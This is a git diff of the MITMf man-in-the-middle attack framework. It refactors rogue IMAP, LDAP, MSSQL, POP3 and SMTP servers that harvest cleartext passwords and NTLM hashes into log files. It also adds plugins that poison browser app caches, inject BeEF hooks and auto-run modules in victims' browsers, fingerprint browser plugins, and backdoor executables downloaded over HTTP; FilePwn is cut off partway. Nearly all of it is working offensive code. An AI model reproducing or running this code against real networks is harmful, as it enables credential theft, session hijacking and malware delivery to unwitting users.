b/core/responder/https/__init__.py similarity index 100% rename from core/protocols/http/__init__.py rename to core/responder/https/__init__.py diff --git a/core/protocols/imap/IMAPPackets.py b/core/responder/imap/IMAPPackets.py similarity index 76% rename from core/protocols/imap/IMAPPackets.py rename to core/responder/imap/IMAPPackets.py index 51f13e8..3e3ed17 100644 --- a/core/protocols/imap/IMAPPackets.py +++ b/core/responder/imap/IMAPPackets.py @@ -16,21 +16,8 @@ # You should have received a copy of the GNU General Public License # along with this program. If not, see . import struct -from odict import OrderedDict - -class Packet(): - fields = OrderedDict([ - ("data", ""), - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in kw.items(): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, self.fields.values())) +from core.responder.odict import OrderedDict +from core.responder.packet import Packet #IMAP4 Greating class class IMAPGreating(Packet): diff --git a/core/protocols/imap/IMAPServer.py b/core/responder/imap/IMAPServer.py similarity index 50% rename from core/protocols/imap/IMAPServer.py rename to core/responder/imap/IMAPServer.py index a05afc6..67e6a55 100644 --- a/core/protocols/imap/IMAPServer.py +++ b/core/responder/imap/IMAPServer.py @@ -1,26 +1,23 @@ -################################################################################## -#IMAP4 Stuff starts here -################################################################################## +import logging +import threading +from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler +from IMAPPackets import * +from core.responder.common import * + +mitmf_logger = logging.getLogger("mitmf") class IMAPServer(): - def serve_thread_tcp(host, port, handler): + def start(self): try: - server = ThreadingTCPServer((host, port), handler) - server.serve_forever() - except Exception, e: - print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) - - #Function name self-explanatory - def start(IMAP_On_Off): - if IMAP_On_Off == "ON": - t = threading.Thread(name="IMAP", target=self.serve_thread_tcp, args=("0.0.0.0", 143,IMAP)) + mitmf_logger.debug("[IMAPServer] online") + server = ThreadingTCPServer(("0.0.0.0", 143), IMAP) + t = threading.Thread(name="IMAPServer", target=server.serve_forever) t.setDaemon(True) t.start() - - if IMAP_On_Off == "OFF": - return False + except Exception, e: + mitmf_logger.error("[IMAPServer] Error starting on port {}: {}".format(143, e)) class ThreadingTCPServer(ThreadingMixIn, TCPServer): @@ -46,13 +43,9 @@ class IMAP(BaseRequestHandler): Outfile = "./logs/responder/IMAP-Clear-Text-Password-"+self.client_address[0]+".txt" WriteData(Outfile,Credentials, Credentials) #print '[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials) - responder_logger.info('[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials)) + mitmf_logger.info('[IMAPServer] IMAP Credentials from {}. ("User" "Pass"): {}'.format(self.client_address[0],Credentials)) self.request.send(str(ditchthisconnection())) data = self.request.recv(1024) - except Exception: - pass - -################################################################################## -#IMAP4 Stuff ends here -################################################################################## \ No newline at end of file + except Exception as e: + mitmf_logger.error("[IMAPServer] Error handling request: {}".format(e)) diff --git a/core/protocols/imap/__init__.py b/core/responder/imap/__init__.py similarity index 100% rename from core/protocols/imap/__init__.py rename to core/responder/imap/__init__.py diff --git a/core/protocols/ldap/LDAPPackets.py b/core/responder/ldap/LDAPPackets.py similarity index 97% rename from core/protocols/ldap/LDAPPackets.py rename to core/responder/ldap/LDAPPackets.py index 7de4409..ce3b64f 100644 --- a/core/protocols/ldap/LDAPPackets.py +++ b/core/responder/ldap/LDAPPackets.py @@ -17,22 +17,8 @@ # along with this program. If not, see . import struct -from odict import OrderedDict - -class Packet(): - fields = OrderedDict([ - ("data", ""), - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in kw.items(): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, self.fields.values())) - +from core.responder.odict import OrderedDict +from core.responder.packet import Packet class LDAPSearchDefaultPacket(Packet): fields = OrderedDict([ diff --git a/core/protocols/ldap/LDAPServer.py b/core/responder/ldap/LDAPServer.py similarity index 72% rename from core/protocols/ldap/LDAPServer.py rename to core/responder/ldap/LDAPServer.py index fa65472..4629f71 100644 --- a/core/protocols/ldap/LDAPServer.py +++ b/core/responder/ldap/LDAPServer.py @@ -1,25 +1,27 @@ -################################################################################## -#LDAP Stuff starts here -################################################################################## +import struct +import logging +import threading +import re + +from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler +from LDAPPackets import * +from core.responder.common import * + +mitmf_logger = logging.getLogger("mitmf") class LDAPServer(): - def serve_thread_tcp(self, host, port, handler): - try: - server = ThreadingTCPServer((host, port), handler) - server.serve_forever() - except Exception, e: - print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + def start(self, chal): + global Challenge; Challenge = chal - #Function name self-explanatory - def start(self, LDAP_On_Off): - if LDAP_On_Off == "ON": - t = threading.Thread(name="LDAP", target=self.serve_thread_tcp, args=("0.0.0.0", 389,LDAP)) + try: + mitmf_logger.debug("[LDAPServer] online") + server = ThreadingTCPServer(("0.0.0.0", 389), LDAP) + t = threading.Thread(name="LDAPServer", target=server.serve_forever) t.setDaemon(True) t.start() - - if LDAP_On_Off == "OFF": - return False + except Exception, e: + mitmf_logger.error("[LDAPServer] Error starting on port {}: {}".format(389, e)) class ThreadingTCPServer(ThreadingMixIn, TCPServer): @@ -54,15 +56,15 @@ def ParseLDAPHash(data,client): UserLen = struct.unpack('. import struct -from odict import OrderedDict - -class Packet(): - fields = OrderedDict([ - ("data", ""), - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in kw.items(): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, self.fields.values())) +from core.responder.odict import OrderedDict +from core.responder.packet import Packet #MS-SQL Pre-login packet class class MSSQLPreLoginAnswer(Packet): diff --git a/core/responder/mssql/MSSQLServer.py b/core/responder/mssql/MSSQLServer.py new file mode 100644 index 0000000..71d38a5 --- /dev/null +++ b/core/responder/mssql/MSSQLServer.py @@ -0,0 +1,127 @@ +import struct +import logging +import threading + +from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler +from MSSQLPackets import * +from core.responder.common import * + +mitmf_logger = logging.getLogger("mitmf") + +class MSSQLServer(): + + def start(self, chal): + global Challenge; Challenge = chal + + try: + mitmf_logger.debug("[MSSQLServer] online") + server = ThreadingTCPServer(("0.0.0.0", 1433), MSSQL) + t = threading.Thread(name="MSSQLServer", target=server.serve_forever) + t.setDaemon(True) + t.start() + except Exception, e: + mitmf_logger.error("[MSSQLServer] Error starting on port {}: {}".format(1433, e)) + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = True + + def server_bind(self): + TCPServer.server_bind(self) + +#This function parse SQL NTLMv1/v2 hash and dump it into a specific file. +def ParseSQLHash(data,client): + SSPIStart = data[8:] + LMhashLen = struct.unpack(' 60: + DomainLen = struct.unpack('H',Data[2:4])[0] + EncryptionValue = Data[PacketLen-7:PacketLen-6] + if re.search("NTLMSSP",Data): + return True + else: + return False + +#MS-SQL server class. +class MSSQL(BaseRequestHandler): + + def handle(self): + try: + while True: + data = self.request.recv(1024) + self.request.settimeout(0.1) + ##Pre-Login Message + if data[0] == "\x12": + buffer0 = str(MSSQLPreLoginAnswer()) + self.request.send(buffer0) + data = self.request.recv(1024) + ##NegoSSP + if data[0] == "\x10": + if re.search("NTLMSSP",data): + t = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge) + t.calculate() + buffer1 = str(t) + self.request.send(buffer1) + data = self.request.recv(1024) + else: + ParseClearTextSQLPass(data,self.client_address[0]) + ##NegoSSP Auth + if data[0] == "\x11": + ParseSQLHash(data,self.client_address[0]) + except Exception: + pass + self.request.close() diff --git a/core/protocols/mssql/__init__.py b/core/responder/mssql/__init__.py similarity index 100% rename from core/protocols/mssql/__init__.py rename to core/responder/mssql/__init__.py diff --git a/core/responder/pop3/POP3Server.py b/core/responder/pop3/POP3Server.py new file mode 100644 index 0000000..860ab91 --- /dev/null +++ b/core/responder/pop3/POP3Server.py @@ -0,0 +1,63 @@ +import logging +import threading + +from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler +from core.responder.common import * +from core.responder.odict import OrderedDict +from core.responder.packet import Packet + +mitmf_logger = logging.getLogger("mitmf") + +class POP3Server(): + + def start(self): + try: + mitmf_logger.debug("[POP3Server] online") + server = ThreadingTCPServer(("0.0.0.0", 110), POP) + t = threading.Thread(name="POP3Server", target=server.serve_forever) + t.setDaemon(True) + t.start() + except Exception, e: + mitmf_logger.error("[POP3Server] Error starting on port {}: {}".format(110, e)) + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = 1 + + def server_bind(self): + TCPServer.server_bind(self) + + +class POPOKPacket(Packet): + fields = OrderedDict([ + ("Code", "+OK"), + ("CRLF", "\r\n"), + ]) + +#POP3 server class. +class POP(BaseRequestHandler): + + def handle(self): + try: + self.request.send(str(POPOKPacket())) + data = self.request.recv(1024) + if data[0:4] == "USER": + User = data[5:].replace("\r\n","") + mitmf_logger.info('[+]POP3 User: %s'%(User)) + t = POPOKPacket() + self.request.send(str(t)) + data = self.request.recv(1024) + if data[0:4] == "PASS": + Pass = data[5:].replace("\r\n","") + Outfile = "./logs/responder/POP3-Clear-Text-Password-"+self.client_address[0]+".txt" + WriteData(Outfile,User+":"+Pass, User+":"+Pass) + mitmf_logger.info("[POP3Server] POP3 Credentials from {}. User/Pass: {}:{} ".format(self.client_address[0],User,Pass)) + t = POPOKPacket() + self.request.send(str(t)) + data = self.request.recv(1024) + else : + t = POPOKPacket() + self.request.send(str(t)) + data = self.request.recv(1024) + except Exception as e: + mitmf_logger.error("[POP3Server] Error handling request: {}".format(e)) \ No newline at end of file diff --git a/core/protocols/pop3/__init__.py b/core/responder/pop3/__init__.py similarity index 100% rename from core/protocols/pop3/__init__.py rename to core/responder/pop3/__init__.py diff --git a/core/protocols/smtp/SMTPPackets.py b/core/responder/smtp/SMTPPackets.py similarity index 81% rename from core/protocols/smtp/SMTPPackets.py rename to core/responder/smtp/SMTPPackets.py index 65e252c..0f80519 100644 --- a/core/protocols/smtp/SMTPPackets.py +++ b/core/responder/smtp/SMTPPackets.py @@ -16,21 +16,8 @@ # You should have received a copy of the GNU General Public License # along with this program. If not, see . import struct -from odict import OrderedDict - -class Packet(): - fields = OrderedDict([ - ("data", ""), - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in kw.items(): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, self.fields.values())) +from core.responder.odict import OrderedDict +from core.responder.packet import Packet #SMTP Greating class class SMTPGreating(Packet): diff --git a/core/responder/smtp/SMTPServer.py b/core/responder/smtp/SMTPServer.py new file mode 100644 index 0000000..f07df49 --- /dev/null +++ b/core/responder/smtp/SMTPServer.py @@ -0,0 +1,62 @@ +import logging +import threading + +from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler +from base64 import b64decode +from SMTPPackets import * +from core.responder.common import * + +mitmf_logger = logging.getLogger("mitmf") + +class SMTPServer(): + + def serve_thread_tcp(self, port): + try: + server = ThreadingTCPServer(("0.0.0.0", port), ESMTP) + server.serve_forever() + except Exception as e: + mitmf_logger.error("[SMTPServer] Error starting TCP server on port {}: {}".format(port, e)) + + #Function name self-explanatory + def start(self): + mitmf_logger.debug("[SMTPServer] online") + t1 = threading.Thread(name="ESMTP-25", target=self.serve_thread_tcp, args=(25,)) + t2 = threading.Thread(name="ESMTP-587", target=self.serve_thread_tcp, args=(587,)) + + for t in [t1, t2]: + t.setDaemon(True) + t.start() + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = 1 + + def server_bind(self): + TCPServer.server_bind(self) + +#ESMTP server class. +class ESMTP(BaseRequestHandler): + + def handle(self): + try: + self.request.send(str(SMTPGreating())) + data = self.request.recv(1024) + if data[0:4] == "EHLO": + self.request.send(str(SMTPAUTH())) + data = self.request.recv(1024) + if data[0:4] == "AUTH": + self.request.send(str(SMTPAUTH1())) + data = self.request.recv(1024) + if data: + Username = b64decode(data[:len(data)-2]) + self.request.send(str(SMTPAUTH2())) + data = self.request.recv(1024) + if data: + Password = b64decode(data[:len(data)-2]) + Outfile = "./logs/responder/SMTP-Clear-Text-Password-"+self.client_address[0]+".txt" + WriteData(Outfile,Username+":"+Password, Username+":"+Password) + #print "[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password) + mitmf_logger.info("[SMTPServer] {} SMTP User: {} Pass:{} ".format(self.client_address[0],Username,Password)) + + except Exception as e: + mitmf_logger.error("[SMTPServer] Error handling request: {}".format(e)) diff --git a/core/protocols/smtp/__init__.py b/core/responder/smtp/__init__.py similarity index 100% rename from core/protocols/smtp/__init__.py rename to core/responder/smtp/__init__.py diff --git a/core/sergioproxy/ProxyPlugins.py b/core/sergioproxy/ProxyPlugins.py index a182326..9fe76cb 100644 --- a/core/sergioproxy/ProxyPlugins.py +++ b/core/sergioproxy/ProxyPlugins.py @@ -103,7 +103,7 @@ class ProxyPlugins: except KeyError as e: pass except Exception as e: - #This is needed because errors in hooked functions won't raise an Exception + Tracback (which can be infuriating) + #This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating) mitmf_logger.error("[ProxyPlugins] Exception occurred in hooked function") traceback.print_exc() diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index 3aadfc5..4f3cb11 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -98,7 +98,7 @@ class ServerConnection(HTTPClient): postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging if len(postdata) > 0: mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], postdata)) - except UnicodeDecodeError: + except UnicodeDecodeError and UnicodeEncodeError: mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host'])) pass diff --git a/libs/bdfactory b/libs/bdfactory index 4609ade..0bd3429 160000 --- a/libs/bdfactory +++ b/libs/bdfactory @@ -1 +1 @@ -Subproject commit 4609adeb5383135352aa27113d8ee1398aecff99 +Subproject commit 0bd3429e6775395c3522046ab21193a36ab2e0fe diff --git a/mitmf.py b/mitmf.py index 349b76b..5263505 100755 --- a/mitmf.py +++ b/mitmf.py @@ -39,8 +39,6 @@ if os.geteuid() != 0: mitmf_version = "0.9.7" sslstrip_version = "0.9" sergio_version = "0.2.1" -dnschef_version = "0.4" -netcreds_version = "1.0" parser = argparse.ArgumentParser(description="MITMf v{} - Framework for MITM attacks".format(mitmf_version), version=mitmf_version, usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]', epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@') @@ -162,17 +160,16 @@ print "|_ SSLstrip v{} by Moxie Marlinspike online".format(sslstrip_version) #Start Net-Creds from core.netcreds.NetCreds import NetCreds NetCreds().start(args.interface, myip) -print "|_ Net-Creds v{} online".format(netcreds_version) +print "|_ Net-Creds v{} online".format(NetCreds.version) #Start DNSChef from core.dnschef.DNSchef import DNSChef DNSChef.getInstance().start() -print "|_ DNSChef v{} online".format(dnschef_version) +print "|_ DNSChef v{} online".format(DNSChef.version) #start the SMB server from core.protocols.smb.SMBserver import SMBserver -from impacket import version -print "|_ SMBserver online (Impacket {})\n".format(version.VER_MINOR) +print "|_ SMBserver online (Impacket {})\n".format(SMBserver.impacket_ver) SMBserver().start() #start the reactor diff --git a/plugins/AppCachePoison.py b/plugins/AppCachePoison.py new file mode 100644 index 0000000..4b787b9 --- /dev/null +++ b/plugins/AppCachePoison.py @@ -0,0 +1,206 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz + +import logging +import re +import os.path +import time +import sys + +from datetime import date +from plugins.plugin import Plugin +from core.sslstrip.URLMonitor import URLMonitor + +mitmf_logger = logging.getLogger("mitmf") + +class AppCachePlugin(Plugin): + name = "App Cache Poison" + optname = "appoison" + desc = "Performs App Cache Poisoning attacks" + implements = ["handleResponse"] + version = "0.3" + has_opts = False + + def initialize(self, options): + self.options = options + self.mass_poisoned_browsers = [] + self.urlMonitor = URLMonitor.getInstance() + + self.urlMonitor.setAppCachePoisoning() + + def handleResponse(self, request, data): + + self.app_config = self.config['AppCachePoison'] # so we reload the config on each request + url = request.client.uri + req_headers = request.client.getAllHeaders() + headers = request.client.responseHeaders + ip = request.client.getClientIP() + + ######################################################################### + + if "enable_only_in_useragents" in self.app_config: + regexp = self.app_config["enable_only_in_useragents"] + if regexp and not re.search(regexp,req_headers["user-agent"]): + mitmf_logger.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"])) + return {'request': request, 'data': data} + + urls = self.urlMonitor.getRedirectionSet(url) + mitmf_logger.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls)) + (name,s,element,url) = self.getSectionForUrls(urls) + + if s is False: + data = self.tryMassPoison(url, data, headers, req_headers, ip) + return {'request': request, 'data': data} + + mitmf_logger.info("%s Found URL %s in section %s" % (ip, url, name)) + p = self.getTemplatePrefix(s) + + if element == 'tamper': + mitmf_logger.info("%s Poisoning tamper URL with template %s" % (ip, p)) + if os.path.exists(p + '.replace'): # replace whole content + f = open(p + '.replace','r') + data = self.decorate(f.read(), s) + f.close() + + elif os.path.exists(p + '.append'): # append file to body + f = open(p + '.append','r') + appendix = self.decorate(f.read(), s) + f.close() + # append to body + data = re.sub(re.compile("",re.IGNORECASE),appendix + "", data) + + # add manifest reference + data = re.sub(re.compile("",re.IGNORECASE),appendix + "", data) + self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip + return data + + def getMassPoisonHtml(self): + html = "
" + for i in self.app_config: + if isinstance(self.app_config[i], dict): + if self.app_config[i].has_key('tamper_url') and not self.app_config[i].get('skip_in_mass_poison', False): + html += "" + + return html + "
" + + def cacheForFuture(self, headers): + ten_years = 315569260 + headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)]) + headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh + in_ten_years = date.fromtimestamp(time.time() + ten_years) + headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")]) + + def removeDangerousHeaders(self, headers): + headers.removeHeader("X-Frame-Options") + + def getSpoofedManifest(self, url, section): + p = self.getTemplatePrefix(section) + if not os.path.exists(p+'.manifest'): + p = self.getDefaultTemplatePrefix() + + f = open(p + '.manifest', 'r') + manifest = f.read() + f.close() + return self.decorate(manifest, section) + + def decorate(self, content, section): + for i in section: + content = content.replace("%%"+i+"%%", section[i]) + return content + + def getTemplatePrefix(self, section): + if section.has_key('templates'): + return self.app_config['templates_path'] + '/' + section['templates'] + + return self.getDefaultTemplatePrefix() + + def getDefaultTemplatePrefix(self): + return self.app_config['templates_path'] + '/default' + + def getManifestUrl(self, section): + return section.get("manifest_url",'/robots.txt') + + def getSectionForUrls(self, urls): + for url in urls: + for i in self.app_config: + if isinstance(self.app_config[i], dict): #section + section = self.app_config[i] + name = i + + if section.get('tamper_url',False) == url: + return (name, section, 'tamper',url) + + if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url): + return (name, section, 'tamper',url) + + if section.get('manifest_url',False) == url: + return (name, section, 'manifest',url) + + if section.get('raw_url',False) == url: + return (name, section, 'raw',url) + + return (None, False,'',urls.copy().pop()) + + diff --git a/plugins/BeefAutorun.py b/plugins/BeefAutorun.py new file mode 100644 index 0000000..e2ade2e --- /dev/null +++ b/plugins/BeefAutorun.py @@ -0,0 +1,127 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import logging +import sys +import json + +from time import sleep +from core.beefapi import BeefAPI +from core.utils import SystemConfig +from plugins.plugin import Plugin +from plugins.Inject import Inject + +mitmf_logger = logging.getLogger("mitmf") + +class BeefAutorun(Inject, Plugin): + name = "BeEFAutorun" + optname = "beefauto" + desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type" + tree_output = [] + depends = ["Inject"] + version = "0.3" + has_opts = False + + def initialize(self, options): + self.options = options + self.ip_address = SystemConfig.getIP(options.interface) + + Inject.initialize(self, options) + + self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode'])) + self.onConfigChange() + + def onConfigChange(self): + + beefconfig = self.config['MITMf']['BeEF'] + + self.html_payload = ''.format(self.ip_address, beefconfig['beefport']) + + self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']}) + if not self.beef.login(beefconfig['user'], beefconfig['pass']): + sys.exit("[-] Error logging in to BeEF!") + + def startThread(self, options): + self.autorun() + + def autorun(self): + already_ran = [] + already_hooked = [] + + while True: + mode = self.config['BeEFAutorun']['mode'] + sessions = self.beef.sessions_online() + if (sessions is not None and len(sessions) > 0): + for session in sessions: + + if session not in already_hooked: + info = self.beef.hook_info(session) + mitmf_logger.info("{} >> joined the horde! [id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os'])) + already_hooked.append(session) + self.black_ips.append(str(info['ip'])) + + if mode == 'oneshot': + if session not in already_ran: + self.execModules(session) + already_ran.append(session) + + elif mode == 'loop': + self.execModules(session) + sleep(10) + + else: + sleep(1) + + def execModules(self, session): + session_info = self.beef.hook_info(session) + session_ip = session_info['ip'] + hook_browser = session_info['name'] + hook_os = session_info['os'] + all_modules = self.config['BeEFAutorun']["ALL"] + targeted_modules = self.config['BeEFAutorun']["targets"] + + if len(all_modules) > 0: + mitmf_logger.info("{} >> sending generic modules".format(session_ip)) + for module, options in all_modules.iteritems(): + mod_id = self.beef.module_id(module) + resp = self.beef.module_run(session, mod_id, json.loads(options)) + if resp["success"] == 'true': + mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id)) + else: + mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id)) + sleep(0.5) + + mitmf_logger.info("{} >> sending targeted modules".format(session_ip)) + for os in targeted_modules: + if (os in hook_os) or (os == hook_os): + browsers = targeted_modules[os] + if len(browsers) > 0: + for browser in browsers: + if browser == hook_browser: + modules = targeted_modules[os][browser] + if len(modules) > 0: + for module, options in modules.iteritems(): + mod_id = self.beef.module_id(module) + resp = self.beef.module_run(session, mod_id, json.loads(options)) + if resp["success"] == 'true': + mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id)) + else: + mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id)) + sleep(0.5) diff --git a/plugins/BrowserProfiler.py b/plugins/BrowserProfiler.py new file mode 100644 index 0000000..1b48b6a --- /dev/null +++ b/plugins/BrowserProfiler.py @@ -0,0 +1,129 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# +import logging + +from pprint import pformat +from plugins.plugin import Plugin +from plugins.Inject import Inject + +mitmf_logger = logging.getLogger("mitmf") + +class BrowserProfiler(Inject, Plugin): + name = "Browser Profiler" + optname = "browserprofiler" + desc = "Attempts to enumerate all browser plugins of connected clients" + implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"] + depends = ["Inject"] + version = "0.2" + has_opts = False + + def initialize(self, options): + Inject.initialize(self, options) + self.html_payload = self.get_payload() + self.dic_output = {} # so other plugins can access the results + + def post2dict(self, post): #converts the ajax post to a dic + dict = {} + for line in post.split('&'): + t = line.split('=') + dict[t[0]] = t[1] + return dict + + def sendPostData(self, request): + #Handle the plugin output + if 'clientprfl' in request.uri: + self.dic_output = self.post2dict(request.postData) + self.dic_output['ip'] = str(request.client.getClientIP()) # add the IP of the client + if self.dic_output['plugin_list'] > 0: + self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',') + pretty_output = pformat(self.dic_output) + mitmf_logger.info("{} >> Browser Profiler data:\n{}".format(request.client.getClientIP(), pretty_output)) + + def get_payload(self): + payload = """""" + + return payload diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py new file mode 100644 index 0000000..54bf08a --- /dev/null +++ b/plugins/FilePwn.py @@ -0,0 +1,650 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something' +# +# Author Joshua Pitts the.midnite.runr 'at' gmail com +# +# Copyright (c) 2013-2014, Joshua Pitts +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without modification, +# are permitted provided that the following conditions are met: +# +# 1. Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# +# 2. Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# +# 3. Neither the name of the copyright holder nor the names of its contributors +# may be used to endorse or promote products derived from this software without +# specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +# POSSIBILITY OF SUCH DAMAGE. +# +# Tested on Kali-Linux. + +import sys +import os +import pefile +import zipfile +import logging +import shutil +import random +import string +import tarfile +import multiprocessing + +from libs.bdfactory import pebin +from libs.bdfactory import elfbin +from libs.bdfactory import machobin +from core.msfrpc import Msfrpc +from plugins.plugin import Plugin +from tempfile import mkstemp +from configobj import ConfigObj + +mitmf_logger = logging.getLogger("mitmf") + +class FilePwn(Plugin): + name = "FilePwn" + optname = "filepwn" + desc = "Backdoor executables being sent over http using bdfactory" + implements = ["handleResponse"] + tree_output = ["BDFProxy v0.3.2 online"] + version = "0.3" + has_opts = False + + def initialize(self, options): + '''Called if plugin is enabled, passed the options namespace''' + self.options = options + + self.patched = multiprocessing.Queue() + + #FOR FUTURE USE + self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream'] + + #FOR FUTURE USE + self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip'] + + #USED NOW + self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0}, + 'pe': {'number': 'MZ', 'offset': 0}, + 'gz': {'number': '1f8b'.decode('hex'), 'offset': 0}, + 'bz': {'number': 'BZ', 'offset': 0}, + 'zip': {'number': '504b0304'.decode('hex'), 'offset': 0}, + 'tar': {'number': 'ustar', 'offset': 257}, + 'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0}, + 'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0}, + 'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0}, + } + + #NOT USED NOW + #self.supportedBins = ('MZ', 